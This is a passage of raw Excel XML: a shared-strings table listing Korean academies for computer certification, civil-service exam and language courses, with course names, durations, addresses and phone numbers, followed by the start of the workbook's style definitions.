    <t>옥동컴퓨터학원</t>
  </si>
  <si>
    <t>워드프로세서, 컴퓨터활용능력
정보처리기사/산업기사</t>
  </si>
  <si>
    <t>3개월</t>
  </si>
  <si>
    <t>안동시 옥동 765-7</t>
  </si>
  <si>
    <t>054-841-3004
fax 841-3014</t>
  </si>
  <si>
    <t>안성컴퓨터학원</t>
  </si>
  <si>
    <t>워드프로세서, 컴퓨터활용능력
정보처리기사/산업기사
사무자동화산업기사</t>
  </si>
  <si>
    <t>안동시 용상동 1155-1</t>
  </si>
  <si>
    <t>054-821-2254
fax 823-4443</t>
  </si>
  <si>
    <t>청어람컴퓨터학원</t>
  </si>
  <si>
    <t>영주시 영주2동 528-1</t>
  </si>
  <si>
    <t>054-635-3325
fax 841-3014</t>
  </si>
  <si>
    <t>이십일세기컴퓨터학원</t>
  </si>
  <si>
    <t>영주시 휴천2동 463-4</t>
  </si>
  <si>
    <t>054-635-1418
fax 635-2115</t>
  </si>
  <si>
    <t>하늘바다영재컴퓨터학원</t>
  </si>
  <si>
    <t>문경시 점촌동 250-33</t>
  </si>
  <si>
    <t>054-555-7039
fax 555-7492</t>
  </si>
  <si>
    <t>예일컴퓨터학원</t>
  </si>
  <si>
    <t>의성군 의성읍 중리리 714-2</t>
  </si>
  <si>
    <t>054-833-7676
fax 834-7675</t>
  </si>
  <si>
    <t>유성비쥬얼컴퓨터학원</t>
  </si>
  <si>
    <t>워드프로세서, 컴퓨터활용능력</t>
  </si>
  <si>
    <t>예천군 예천읍 노하리 72-6</t>
  </si>
  <si>
    <t>054-654-8882</t>
  </si>
  <si>
    <t>중앙컴퓨터학원</t>
  </si>
  <si>
    <t>워드프로세서, 컴퓨터활용능력
정보화처리기사/산업기사
사무자동화산업기사</t>
  </si>
  <si>
    <t>봉화군 봉화읍 내성리 276</t>
  </si>
  <si>
    <t>054-673-2556</t>
  </si>
  <si>
    <t>진보컴퓨터학원</t>
  </si>
  <si>
    <t>청송군 진보면 진안리 47-2</t>
  </si>
  <si>
    <t>054-874-3137</t>
  </si>
  <si>
    <t>경주보훈지청
(☎054-778-2659)
(fax054-778-2670)</t>
  </si>
  <si>
    <t>삼성컴퓨터학원</t>
  </si>
  <si>
    <t>컴퓨터활용능력, 워드프로세서, 정보처리</t>
  </si>
  <si>
    <t>1-2개월</t>
  </si>
  <si>
    <t>포항시 북구 용흥2동 120-14</t>
  </si>
  <si>
    <r>
      <t>054-282-1444</t>
    </r>
  </si>
  <si>
    <t>예일외국어학원</t>
  </si>
  <si>
    <t>토익 (초급,중급), JLPT, HSK</t>
  </si>
  <si>
    <t>3-6개월</t>
  </si>
  <si>
    <t>포항시 북구 죽도2동 51-4</t>
  </si>
  <si>
    <t>054-275-4500</t>
  </si>
  <si>
    <t>엘리트컴퓨터외국어스쿨</t>
  </si>
  <si>
    <t>컴퓨터활용능력, 워드프로세서, 정보처리, HSK</t>
  </si>
  <si>
    <t>1-3개월</t>
  </si>
  <si>
    <t>경주시 동천동 826-11</t>
  </si>
  <si>
    <t>054-742-2530</t>
  </si>
  <si>
    <t>ETC외국어학원</t>
  </si>
  <si>
    <t>토익 (초급,중급,고급)</t>
  </si>
  <si>
    <t>경주시 성건동 620-448</t>
  </si>
  <si>
    <t>054-773-6522</t>
  </si>
  <si>
    <t>컴퓨터활용능력, 워드프로세서, 정보처리</t>
  </si>
  <si>
    <t>1-3개월</t>
  </si>
  <si>
    <t>영천시 야사동290-1</t>
  </si>
  <si>
    <t>054-338-3900</t>
  </si>
  <si>
    <t>글로벌외국어학원</t>
  </si>
  <si>
    <t>토익, JPT</t>
  </si>
  <si>
    <t>경북 포항시 남구 대도동 94-6</t>
  </si>
  <si>
    <t>054-283-0515</t>
  </si>
  <si>
    <t>유비컴 컴퓨터 전산학원</t>
  </si>
  <si>
    <t>1-2개월</t>
  </si>
  <si>
    <t>경북 포항시 남구 상도동 669-12</t>
  </si>
  <si>
    <t>054-272-6457</t>
  </si>
  <si>
    <t>동부고시학원</t>
  </si>
  <si>
    <t>9,7급, 기능직공무원</t>
  </si>
  <si>
    <t>광주 동구 대인동 28</t>
  </si>
  <si>
    <t>234-1112</t>
  </si>
  <si>
    <t>무등고시학원</t>
  </si>
  <si>
    <t>광주 동구 대의동 33</t>
  </si>
  <si>
    <t>222-4560</t>
  </si>
  <si>
    <t>새서울고시학원</t>
  </si>
  <si>
    <t>광주 북구 중흥3동 279-38</t>
  </si>
  <si>
    <t>514-4560</t>
  </si>
  <si>
    <t>용봉고시학원</t>
  </si>
  <si>
    <t>광주 북구 용봉동 161-39</t>
  </si>
  <si>
    <t>261-9624</t>
  </si>
  <si>
    <t>전대고시경찰학원</t>
  </si>
  <si>
    <t>광주 북구 용봉동 161-30
싼타페 건물 3,4층</t>
  </si>
  <si>
    <t>266-0580</t>
  </si>
  <si>
    <t>스티마행정고시학원</t>
  </si>
  <si>
    <t>광주 동구 대의동 76-1 효임빌딩</t>
  </si>
  <si>
    <t>236-0580</t>
  </si>
  <si>
    <t>패스경찰아카데미</t>
  </si>
  <si>
    <t>한빛고시학원</t>
  </si>
  <si>
    <t>광주 북구 중흥동 279-42</t>
  </si>
  <si>
    <t>252-0252</t>
  </si>
  <si>
    <t>곽내영고시학원</t>
  </si>
  <si>
    <t>임용고시</t>
  </si>
  <si>
    <t>광주 북구 신안동 134-12</t>
  </si>
  <si>
    <t>529-0090</t>
  </si>
  <si>
    <t>곽영일외국어학원</t>
  </si>
  <si>
    <t>토익, 토플</t>
  </si>
  <si>
    <t>광주 동구 대의동 1-2, 1층</t>
  </si>
  <si>
    <t>226-0515</t>
  </si>
  <si>
    <t>민병철외국어학원</t>
  </si>
  <si>
    <t>광주 동구 대의동 13-1, 3층</t>
  </si>
  <si>
    <t>222-0511</t>
  </si>
  <si>
    <t>세계외국어학원</t>
  </si>
  <si>
    <t>광주 동구 대인동 28번지 2층</t>
  </si>
  <si>
    <t>228-0749</t>
  </si>
  <si>
    <t>시사영어학원</t>
  </si>
  <si>
    <t>광주 동구 대의동 15-1</t>
  </si>
  <si>
    <t>224-1509</t>
  </si>
  <si>
    <t>프린스턴어학원</t>
  </si>
  <si>
    <t>광주 동구 금남로 전일빌딩 3층</t>
  </si>
  <si>
    <t>430-9937</t>
  </si>
  <si>
    <t>제제외국어학원</t>
  </si>
  <si>
    <t>광주 동구 광산동 77-6</t>
  </si>
  <si>
    <t>228-0596</t>
  </si>
  <si>
    <t>MBC영어교육원</t>
  </si>
  <si>
    <t>광주 동구 대의동 13-2</t>
  </si>
  <si>
    <t>232-8181</t>
  </si>
  <si>
    <t>광주중국어학원</t>
  </si>
  <si>
    <t>HSK</t>
  </si>
  <si>
    <t>광주 서구 치평동 1187-2 
월계수타운 303호</t>
  </si>
  <si>
    <t>383-1605</t>
  </si>
  <si>
    <t>리틀차이나중국어전문학원</t>
  </si>
  <si>
    <t>광주 동구 금남로 4가 21번지</t>
  </si>
  <si>
    <t>233-9582</t>
  </si>
  <si>
    <t>글로벌외국어학원</t>
  </si>
  <si>
    <t>토익,JPT</t>
  </si>
  <si>
    <t>광주 동구 금남로 2가 19-1</t>
  </si>
  <si>
    <t>228-8282</t>
  </si>
  <si>
    <t>아스카일본어전문어학원</t>
  </si>
  <si>
    <t>JPT</t>
  </si>
  <si>
    <t>광주 동구 대의동 17-2</t>
  </si>
  <si>
    <t>232-1503</t>
  </si>
  <si>
    <t>KJ일본어전문학원</t>
  </si>
  <si>
    <t>광주 동구 대의동 82-2</t>
  </si>
  <si>
    <t>227-5005</t>
  </si>
  <si>
    <t>광주국제직업전문학교
(국제컴퓨터 전대점)</t>
  </si>
  <si>
    <t>워드, 컴활</t>
  </si>
  <si>
    <t>광주 북구 중흥동 279-60 
광주은행 3층</t>
  </si>
  <si>
    <t>266-6617</t>
  </si>
  <si>
    <t>정보처리기능사(기사)</t>
  </si>
  <si>
    <t>사무자동화산업기사</t>
  </si>
  <si>
    <t>국제직업전문학교
(국제컴퓨터 조대점)</t>
  </si>
  <si>
    <t>광주 동구 서석동 25-7</t>
  </si>
  <si>
    <t>223-6123</t>
  </si>
  <si>
    <t>중앙 IT 직업전문학교</t>
  </si>
  <si>
    <t>223-0050</t>
  </si>
  <si>
    <t>2개월</t>
  </si>
  <si>
    <t>과정명</t>
  </si>
  <si>
    <t>주소</t>
  </si>
  <si>
    <t>전화번호</t>
  </si>
  <si>
    <t>02-2634-2111</t>
  </si>
  <si>
    <t>그린컴퓨터아트학원(신촌)</t>
  </si>
  <si>
    <t>컴퓨터활용, 정보처리, 사무자동화</t>
  </si>
  <si>
    <t>02-715-2111</t>
  </si>
  <si>
    <t>더조은컴퓨터아트학원</t>
  </si>
  <si>
    <t>컴퓨터활용1,2급, 사무자동화산업기사</t>
  </si>
  <si>
    <t>서울 마포구 노고산동 57-1 그랜드마트 7층</t>
  </si>
  <si>
    <t>7급 전기직, 방송기술직, 통신직</t>
  </si>
  <si>
    <t>2개월</t>
  </si>
  <si>
    <t>10급 공무원</t>
  </si>
  <si>
    <t>김기남방송통신
전기전산학원</t>
  </si>
  <si>
    <t>전기직7,9급 전송기술직7,9급 통신기술직9급</t>
  </si>
  <si>
    <t>서울 영등포구 영등포동 618-79</t>
  </si>
  <si>
    <t>02-835-2146</t>
  </si>
  <si>
    <t>9급공무원(행정, 경찰, 소방), 군무원, 기능직공무원,
중국어(HSK), 일본어(JPT), 정보화자격증</t>
  </si>
  <si>
    <t>베리타스M㈜</t>
  </si>
  <si>
    <t>행정직, 세무직 9급</t>
  </si>
  <si>
    <t>2개월</t>
  </si>
  <si>
    <t>동작구 노량진1동 117-2 영빌딩 2층</t>
  </si>
  <si>
    <t>02-826-5203</t>
  </si>
  <si>
    <t>7급반</t>
  </si>
  <si>
    <t>개별단과</t>
  </si>
  <si>
    <t>1개월</t>
  </si>
  <si>
    <t>경찰공무원</t>
  </si>
  <si>
    <t>강남박문각행정고시</t>
  </si>
  <si>
    <t>9급,7급,소방직, 군무원</t>
  </si>
  <si>
    <t>서초구 서초동 1317-2</t>
  </si>
  <si>
    <t>02-3476-6030</t>
  </si>
  <si>
    <t>단과반</t>
  </si>
  <si>
    <t>에듀스파행정고시학원</t>
  </si>
  <si>
    <t>9급, 7급공무원</t>
  </si>
  <si>
    <t>동작구 노량진1동 71-2</t>
  </si>
  <si>
    <t>02-3280-9990</t>
  </si>
  <si>
    <t>남부경찰학원</t>
  </si>
  <si>
    <t>남부행정고시학원</t>
  </si>
  <si>
    <t>02-815-7819</t>
  </si>
  <si>
    <t>웅진패스원
한교고시학원</t>
  </si>
  <si>
    <t>9급, 7급공무원, 9급세무직, 경찰직</t>
  </si>
  <si>
    <t>동작구 노량진동 71-2</t>
  </si>
  <si>
    <t>02-813-6004</t>
  </si>
  <si>
    <t>법원직공무원</t>
  </si>
  <si>
    <t>3개월</t>
  </si>
  <si>
    <t>강남이익훈어학원</t>
  </si>
  <si>
    <t>토익,텝스(토플은 안됨)</t>
  </si>
  <si>
    <t>서초구 서초동 1327-8</t>
  </si>
  <si>
    <t>02-3472-3322</t>
  </si>
  <si>
    <t>해커스어학원(강남)</t>
  </si>
  <si>
    <t>토익,토플,텝스정규반</t>
  </si>
  <si>
    <t>강남구 삼성동 141 성원빌딩</t>
  </si>
  <si>
    <t>02-566-0001</t>
  </si>
  <si>
    <t>박정어학원(압구정,신촌)</t>
  </si>
  <si>
    <t>토익,토플</t>
  </si>
  <si>
    <t>강남구 신사동 583 운강빌딩</t>
  </si>
  <si>
    <t>02-547-0509</t>
  </si>
  <si>
    <t>미주컴퓨터학원</t>
  </si>
  <si>
    <t>워드, 컴활, 정보처리,사무자동화</t>
  </si>
  <si>
    <t>필기 1개월
실기 1개월</t>
  </si>
  <si>
    <t>구로구 구로5동 528-7</t>
  </si>
  <si>
    <t>02-868-0400</t>
  </si>
  <si>
    <t>그린컴퓨터아트학원</t>
  </si>
  <si>
    <t>정보처리, MOS, OA</t>
  </si>
  <si>
    <t>서초구 강남구 역삼동 815-4 만이빌딩</t>
  </si>
  <si>
    <t>02-3481-1005</t>
  </si>
  <si>
    <t>정보처리</t>
  </si>
  <si>
    <t>하나컴퓨터</t>
  </si>
  <si>
    <t>워드,컴퓨터활용능력, 정보처리,사무자동화산업기사,정보처리기사,워드컴활자격증</t>
  </si>
  <si>
    <t>필기1개월
실기1개월</t>
  </si>
  <si>
    <t>관악구 신림8동 519-8</t>
  </si>
  <si>
    <t>02-858-8710</t>
  </si>
  <si>
    <t>더조은컴퓨터학원</t>
  </si>
  <si>
    <t>워드프로세서</t>
  </si>
  <si>
    <t>서초구 서초동 1306-8 대동빌딩 10층</t>
  </si>
  <si>
    <t>02-3482-8790</t>
  </si>
  <si>
    <t>컴활, 정보처리기능사, 사무자동화산업기사</t>
  </si>
  <si>
    <t>희소고시학원</t>
  </si>
  <si>
    <t>교육학, 전공과목</t>
  </si>
  <si>
    <t>동작구 노량진동 148-87</t>
  </si>
  <si>
    <t>02-817-4900</t>
  </si>
  <si>
    <t>굿샘임용고시학원</t>
  </si>
  <si>
    <t>교육한, 전공과목</t>
  </si>
  <si>
    <t>동작구 노량진동 71-2 이데아빌딩 4층</t>
  </si>
  <si>
    <t>02-814-9011-4</t>
  </si>
  <si>
    <t>노량진행정고시학원</t>
  </si>
  <si>
    <t>동작구 노량진1동 151-10</t>
  </si>
  <si>
    <t>02-816-2030</t>
  </si>
  <si>
    <t>4세대컴퓨터학원</t>
  </si>
  <si>
    <t>사무자동화산업기사</t>
  </si>
  <si>
    <t>필기3개월
실기2개월</t>
  </si>
  <si>
    <t>강남구 대치4동 922-23</t>
  </si>
  <si>
    <t>02-508-6604</t>
  </si>
  <si>
    <t>컴퓨터활용능력</t>
  </si>
  <si>
    <t>필기2개월
실기2개월</t>
  </si>
  <si>
    <t>합격의법학원</t>
  </si>
  <si>
    <t>공무원, 토익</t>
  </si>
  <si>
    <t>관악구 대학동 밀라트 빌딩 240-4번지</t>
  </si>
  <si>
    <t>02-888-3300</t>
  </si>
  <si>
    <t>국제컴퓨터학원</t>
  </si>
  <si>
    <t>워드, 컴퓨터활용능력, 정보처리</t>
  </si>
  <si>
    <t>서초구 서초동 1309-1 디오빌2층</t>
  </si>
  <si>
    <t>02-535-9951</t>
  </si>
  <si>
    <t>강남차이나로중국어학원</t>
  </si>
  <si>
    <t>HSK</t>
  </si>
  <si>
    <t>강남구 역삼동 635-10 장연빌딩 5층</t>
  </si>
  <si>
    <t>02-565-9183</t>
  </si>
  <si>
    <t>아람컴퓨터학원</t>
  </si>
  <si>
    <t>워드, 컴활, 정보처리기능사</t>
  </si>
  <si>
    <t>2~3개월</t>
  </si>
  <si>
    <t>동작구 사당2동 105번지</t>
  </si>
  <si>
    <t>02-593-5424</t>
  </si>
  <si>
    <t>일등고시학원</t>
  </si>
  <si>
    <t>임용고시과정</t>
  </si>
  <si>
    <t>동작구 노량진 67-11</t>
  </si>
  <si>
    <t>02-813-2115</t>
  </si>
  <si>
    <t>국가고시학원
(국가공무원, 경찰학원)</t>
  </si>
  <si>
    <t>7,9급공무원, 경찰공무원</t>
  </si>
  <si>
    <t>동작구 대방동 339-1 솔표빌딩 5층</t>
  </si>
  <si>
    <t>02-6332-0088</t>
  </si>
  <si>
    <t>강남파고다학원</t>
  </si>
  <si>
    <t>토익,토플전과정</t>
  </si>
  <si>
    <t>2~3개월</t>
  </si>
  <si>
    <t>서초구서초동1306-6,7 파고다타워</t>
  </si>
  <si>
    <t>02-2051-4000</t>
  </si>
  <si>
    <t>구평회G고시학원</t>
  </si>
  <si>
    <t>동작구 노량진1동 143-2 JH빌딩 3층</t>
  </si>
  <si>
    <t>02-812-5700</t>
  </si>
  <si>
    <t>신영진컴퓨터학원</t>
  </si>
  <si>
    <t>워드프로세서,컴퓨터활용능력,정보처리기능사</t>
  </si>
  <si>
    <t>1개월과정</t>
  </si>
  <si>
    <t>서울구로구신도림동437-1 
태영B/D 606호</t>
  </si>
  <si>
    <t>02-2631-3139</t>
  </si>
  <si>
    <t>데카르트고시학원</t>
  </si>
  <si>
    <t>7급,9급,정보화과정</t>
  </si>
  <si>
    <t>2개월과정</t>
  </si>
  <si>
    <t>서울 동작구 노량진1동 194-3번지 
백명트랜디타워 2층</t>
  </si>
  <si>
    <t>02-6080-1725</t>
  </si>
  <si>
    <t>이그잼고시학원</t>
  </si>
  <si>
    <t>공무원과정</t>
  </si>
  <si>
    <t>동작구 노량진동 114-5 정진빌딩</t>
  </si>
  <si>
    <t>1588-2976</t>
  </si>
  <si>
    <t>서울지방보훈청
(☎02-2125-0838)
(fax 02-796-3657)</t>
  </si>
  <si>
    <t>그린컴퓨터아트학원(영등포)</t>
  </si>
  <si>
    <t>컴퓨터활용(1,2급), 정보처리</t>
  </si>
  <si>
    <t>1개월</t>
  </si>
  <si>
    <t>서울 영등포구 영등포동5가 25-11</t>
  </si>
  <si>
    <t>1~2개월</t>
  </si>
  <si>
    <t>서울 마포구 노고산동 31-11 신촌웨딩홀 5층</t>
  </si>
  <si>
    <t>02-716-2278</t>
  </si>
  <si>
    <t>수도전기전자통신
정보처리학원</t>
  </si>
  <si>
    <t>서울 영등포구 영등포동1가 143-3 삼보빌딩 10층</t>
  </si>
  <si>
    <t>02-2676-0555</t>
  </si>
  <si>
    <t>9급 전기직, 방송기술직, 통신직</t>
  </si>
  <si>
    <t>정보처리, 컴퓨터활용능력, 사무자동화</t>
  </si>
  <si>
    <t>8주</t>
  </si>
  <si>
    <t>대한고시학원</t>
  </si>
  <si>
    <t>2~3개월</t>
  </si>
  <si>
    <t>서울 영등포구 문래2가 34-6 운수빌딩 4층</t>
  </si>
  <si>
    <t>02-831-8009</t>
  </si>
  <si>
    <t>박문각행정고시학원</t>
  </si>
  <si>
    <t>7급, 9급 종합반
10급 기능직, 단과반</t>
  </si>
  <si>
    <t>1개월부터</t>
  </si>
  <si>
    <t>서울시 종로구 공평동 139</t>
  </si>
  <si>
    <t>02-733-2288
(02-730-9044)</t>
  </si>
  <si>
    <t>종로이익훈어학원</t>
  </si>
  <si>
    <t>토익,토플,텝스</t>
  </si>
  <si>
    <t xml:space="preserve">1개월부터 </t>
  </si>
  <si>
    <t>서울시 종로구 관철동 155
(종로일번가빌딩 2층)</t>
  </si>
  <si>
    <t>02-723-3333
(02-723-0826)</t>
  </si>
  <si>
    <t>종로플랜티어학원</t>
  </si>
  <si>
    <t xml:space="preserve"> 서울시 종로구 공평동 55
</t>
  </si>
  <si>
    <t>02-735-3322
(02-735-3152)</t>
  </si>
  <si>
    <t>정보처리,사무자동화산업기사</t>
  </si>
  <si>
    <t>2개월</t>
  </si>
  <si>
    <t>서울종로구 종로2가 75-9
(미려빌딩 6층)</t>
  </si>
  <si>
    <t>02-733-0767
(02-733-8923)</t>
  </si>
  <si>
    <t>컴퓨터활용능력</t>
  </si>
  <si>
    <t>그린컴퓨터아트학원
(종로점)</t>
  </si>
  <si>
    <t>정보처리산업기사</t>
  </si>
  <si>
    <t>서울시 종로구 인사동 43번지
 (대일빌딩 5층)</t>
  </si>
  <si>
    <t>02-722-2111
(02-739-5544)</t>
  </si>
  <si>
    <t>국가공무원경찰학원</t>
  </si>
  <si>
    <t>7.9급 경찰공무원</t>
  </si>
  <si>
    <t>3개월</t>
  </si>
  <si>
    <t>서울시 종로구 인의동 112-14
(세운스퀘어 6층)</t>
  </si>
  <si>
    <t>02-6272-0088
(02-6272-0088)</t>
  </si>
  <si>
    <t>종로국가정보학원</t>
  </si>
  <si>
    <t>국정원,경호처 과정</t>
  </si>
  <si>
    <t>6개월</t>
  </si>
  <si>
    <t>서울시 종로구 관철동 10-1</t>
  </si>
  <si>
    <t>02-725-8668
(02-723-2267)</t>
  </si>
  <si>
    <t>해커스종로</t>
  </si>
  <si>
    <t>서울시 종로구 인사동 43
(대일빌딩 9층)</t>
  </si>
  <si>
    <t>02-537-0707
(02-554-0551)</t>
  </si>
  <si>
    <t>수원행정고시학원</t>
  </si>
  <si>
    <t>9급 공무원, 경찰</t>
  </si>
  <si>
    <t>경기 수원시 팔달구 매산로1가 11-12 아이메카빌딩 1층</t>
  </si>
  <si>
    <t>031-254-8282</t>
  </si>
  <si>
    <t>제일고시학원</t>
  </si>
  <si>
    <t>9급 공무원</t>
  </si>
  <si>
    <t>경기 안양시 동안구 호계동 1047-8 센터프라자 6층</t>
  </si>
  <si>
    <t>031-382-4000</t>
  </si>
  <si>
    <t>글로벌어학원(수원역점)</t>
  </si>
  <si>
    <t>토익, JLPT</t>
  </si>
  <si>
    <t>1~2개월</t>
  </si>
  <si>
    <t>경기 수원시 팔달구 매산로1가 157-105 비전포에버빌딩 4층</t>
  </si>
  <si>
    <t>031-254-6969</t>
  </si>
  <si>
    <t>글로벌어학원(안산점)</t>
  </si>
  <si>
    <t>토익</t>
  </si>
  <si>
    <t>경기 안산시 단원구 고잔2동 531-2 에메랄드 빌딩 6층</t>
  </si>
  <si>
    <t>031-485-1579</t>
  </si>
  <si>
    <t>글로벌어학원(분당점)</t>
  </si>
  <si>
    <t>경기 성남시 분당구 수내동 20-2 초림프라자 5층 509호</t>
  </si>
  <si>
    <t>031-701-6969</t>
  </si>
  <si>
    <t>정보처리, 컴퓨터활용능력, 사무자동화</t>
  </si>
  <si>
    <t>경기 수원시 팔달구 맨산로1가 55-3 3,4층</t>
  </si>
  <si>
    <t>031-243-2111</t>
  </si>
  <si>
    <t>국가고시학원</t>
  </si>
  <si>
    <t>7,9급 공무원, 경찰공무원</t>
  </si>
  <si>
    <t>경기 수원시 팔달구 매산로1가 11-3 세진브론즈빌 4층</t>
  </si>
  <si>
    <t>031-244-0112</t>
  </si>
  <si>
    <t>이지외국어학원(동수원)</t>
  </si>
  <si>
    <t>경기 수원시 팔달구 우만동 88-3 용신빌딩 5,6,7층</t>
  </si>
  <si>
    <t>031-246-0582</t>
  </si>
  <si>
    <t>이지외국어학원3캠퍼스</t>
  </si>
  <si>
    <t>경기 수원시 팔달구 매산로1가 11-12 아이메카 8층</t>
  </si>
  <si>
    <t>031-254-0515</t>
  </si>
  <si>
    <t>국제외국어학원</t>
  </si>
  <si>
    <t>토익, JLPT,JPT</t>
  </si>
  <si>
    <t>경기 수원시 팔달구 매산로1가 54-6 3층</t>
  </si>
  <si>
    <t>031-256-0515</t>
  </si>
  <si>
    <t>월드외국어학원</t>
  </si>
  <si>
    <t>HSK,JLPT,JPT</t>
  </si>
  <si>
    <t>경기 수원시 영통구 원천동 79-87 예스프라자 3층</t>
  </si>
  <si>
    <t>031-214-0645</t>
  </si>
  <si>
    <t>소망외국어학원</t>
  </si>
  <si>
    <t>토익, 토플</t>
  </si>
  <si>
    <t>031-214-0648</t>
  </si>
  <si>
    <t>토토어학원</t>
  </si>
  <si>
    <t>경기 평택시 평택동 293-3 남서울프라자 5층</t>
  </si>
  <si>
    <t>031-653-5516</t>
  </si>
  <si>
    <t>광주디자인컴퓨터학원</t>
  </si>
  <si>
    <t>워드,컴활,정보처리,사무자동화</t>
  </si>
  <si>
    <t>경기 광주시 송정동 121-1 3층</t>
  </si>
  <si>
    <t>031-767-3030</t>
  </si>
  <si>
    <t>평촌아트컴퓨터학원</t>
  </si>
  <si>
    <t>경기 안양시 동안구 평촌동 900-7 제일상가 703호</t>
  </si>
  <si>
    <t>031-385-4224</t>
  </si>
  <si>
    <t>인천행정고시학원</t>
  </si>
  <si>
    <t>9급공무원(종합)</t>
  </si>
</sst>
</file>

<file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <numFmts count="7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\&quot;#,##0;&quot;\&quot;&quot;\&quot;\-#,##0"/>
    <numFmt numFmtId="179" formatCode="_ * #,##0.00_ ;_ * \-#,##0.00_ ;_ * &quot;-&quot;_ ;_ @_ "/>
    <numFmt numFmtId="180" formatCode="&quot;\&quot;#,##0.00;&quot;\&quot;\-#,##0.00"/>
    <numFmt numFmtId="181" formatCode="0_ "/>
    <numFmt numFmtId="182" formatCode="[&lt;=9999999]###\-####;\(0##\)\ ###\-####"/>
    <numFmt numFmtId="183" formatCode="0;[Red]0"/>
    <numFmt numFmtId="184" formatCode="0_);[Red]\(0\)"/>
    <numFmt numFmtId="185" formatCode="0_);\(0\)"/>
    <numFmt numFmtId="186" formatCode="0000000000000"/>
    <numFmt numFmtId="187" formatCode="_-* #,##0.00\ &quot;DM&quot;_-;\-* #,##0.00\ &quot;DM&quot;_-;_-* &quot;-&quot;??\ &quot;DM&quot;_-;_-@_-"/>
    <numFmt numFmtId="188" formatCode="&quot;\&quot;#,##0.00;[Red]&quot;\&quot;&quot;\&quot;&quot;\&quot;&quot;\&quot;&quot;\&quot;&quot;\&quot;\-#,##0.00"/>
    <numFmt numFmtId="189" formatCode="#,###"/>
    <numFmt numFmtId="190" formatCode="\(0\)"/>
    <numFmt numFmtId="191" formatCode="mm&quot;월&quot;\ dd&quot;일&quot;"/>
    <numFmt numFmtId="192" formatCode="#,##0_ "/>
    <numFmt numFmtId="193" formatCode="_-* #,##0.000000_-;\-* #,##0.000000_-;_-* &quot;-&quot;??????_-;_-@_-"/>
    <numFmt numFmtId="194" formatCode="#,##0.0_);[Red]\(#,##0.0\)"/>
    <numFmt numFmtId="195" formatCode="00.0"/>
    <numFmt numFmtId="196" formatCode="0.00_ "/>
    <numFmt numFmtId="197" formatCode="00"/>
    <numFmt numFmtId="198" formatCode="#,##0;[Red]&quot;-&quot;#,##0"/>
    <numFmt numFmtId="199" formatCode="0.0"/>
    <numFmt numFmtId="200" formatCode="#&quot;종&quot;"/>
    <numFmt numFmtId="201" formatCode="0.0_);[Red]\(0.0\)"/>
    <numFmt numFmtId="202" formatCode="#,##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-* #,##0.0_-;\-* #,##0.0_-;_-* &quot;-&quot;_-;_-@_-"/>
    <numFmt numFmtId="208" formatCode="######\-#######"/>
    <numFmt numFmtId="209" formatCode="000\-000"/>
    <numFmt numFmtId="210" formatCode="_-* #,##0.0_-;\-* #,##0.0_-;_-* &quot;-&quot;?_-;_-@_-"/>
    <numFmt numFmtId="211" formatCode="&quot;영암 덕진 용산&quot;\&amp;&quot;&quot;"/>
    <numFmt numFmtId="212" formatCode="&quot;영암 덕진 용산&quot;######"/>
    <numFmt numFmtId="213" formatCode="&quot;영암 덕진 용산&quot;\&amp;&quot;######&quot;"/>
    <numFmt numFmtId="214" formatCode="#,##0\ &quot;월&quot;"/>
    <numFmt numFmtId="215" formatCode="#,##0&quot;월&quot;"/>
    <numFmt numFmtId="216" formatCode="#,##0&quot;일&quot;"/>
    <numFmt numFmtId="217" formatCode="_-* #,##0.00_-;\-* #,##0.00_-;_-* &quot;-&quot;_-;_-@_-"/>
    <numFmt numFmtId="218" formatCode="#,##0;\-#,##0;\-"/>
    <numFmt numFmtId="219" formatCode="#,##0.0;\-#,##0.0;\-"/>
    <numFmt numFmtId="220" formatCode="#,##0;&quot;△&quot;#,##0;\-"/>
    <numFmt numFmtId="221" formatCode="#,##0.0;&quot;△&quot;#,##0.0;\-"/>
    <numFmt numFmtId="222" formatCode="#,##0.00;&quot;△&quot;#,##0.00;\-"/>
    <numFmt numFmtId="223" formatCode="_-* #,##0_-;&quot;△&quot;* #,##0_-;_-* &quot;-&quot;_-;_-@_-"/>
    <numFmt numFmtId="224" formatCode="0.0%"/>
    <numFmt numFmtId="225" formatCode="#,##0;[Red]&quot;△&quot;#,##0"/>
    <numFmt numFmtId="226" formatCode="&quot;ㅇ&quot;\ @"/>
    <numFmt numFmtId="227" formatCode="&quot;ㅇ&quot;@"/>
    <numFmt numFmtId="228" formatCode="#,###&quot;건&quot;"/>
    <numFmt numFmtId="229" formatCode="#,##0.0"/>
    <numFmt numFmtId="230" formatCode="[$-412]yyyy&quot;년&quot;\ m&quot;월&quot;\ d&quot;일&quot;\ dddd"/>
    <numFmt numFmtId="231" formatCode="yyyy/mm/dd\~mm/dd"/>
    <numFmt numFmtId="232" formatCode="yyyy&quot;년&quot;\ m&quot;월&quot;\ d&quot;일&quot;;@"/>
    <numFmt numFmtId="233" formatCode="&quot;@&quot;&quot;소&quot;\ \ &quot;계&quot;"/>
    <numFmt numFmtId="234" formatCode="&quot;소&quot;\ \ \ \ \ \ \ &quot;계&quot;\(\ #\ &quot;건&quot;\)"/>
    <numFmt numFmtId="235" formatCode="&quot;합&quot;\ \ \ \ \ \ \ &quot;계&quot;\(\ #\ &quot;건&quot;\)"/>
    <numFmt numFmtId="236" formatCode="&quot;합            계&quot;\ \(\ #\ &quot;건&quot;\)"/>
    <numFmt numFmtId="237" formatCode="#,##0_ ;[Red]&quot;△&quot;#,##0\ "/>
    <numFmt numFmtId="238" formatCode="0.0000%"/>
  </numFmts>
  <fonts count="65">
    <font>
      <sz val="11"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val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u val="single"/>
      <sz val="11"/>
      <color indexed="12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</font>
    <font>
      <sz val="8"/>
      <name val="맑은 고딕"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10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sz val="9"/>
      <color indexed="8"/>
      <name val="±¼¸²ü"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="8"/>
      <name val="굴림체"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="굴림"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="9"/>
      <name val="맑은 고딕"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="9"/>
      <color indexed="8"/>
      <name val="맑은 고딕"/>
      <family val="3"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <name val="돋움"/>
      <family val="3"/>
    </font>
    <font>
      <sz val="10"/>
